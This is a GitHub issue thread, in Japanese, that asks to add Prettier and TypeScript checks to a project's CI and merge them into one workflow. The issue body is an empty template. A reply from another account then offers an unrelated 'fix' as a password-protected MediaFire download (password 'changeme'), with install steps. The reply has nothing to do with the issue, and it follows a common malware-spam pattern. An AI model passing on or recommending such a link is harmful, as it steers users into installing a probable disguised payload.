### ISSUE TITLE
✨ [新機能] - CIにPrettierとTypeScriptを追加、1つにまとめる

### ISSUE THREAD

**Issue by illionillion** [OCS-GEEK-HACK/shikashiru#17]
### 追加情報

- [ ] UI/UXの変更が必要
- [ ] ドキュメントの更新が必要
- [ ] テストが必要

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
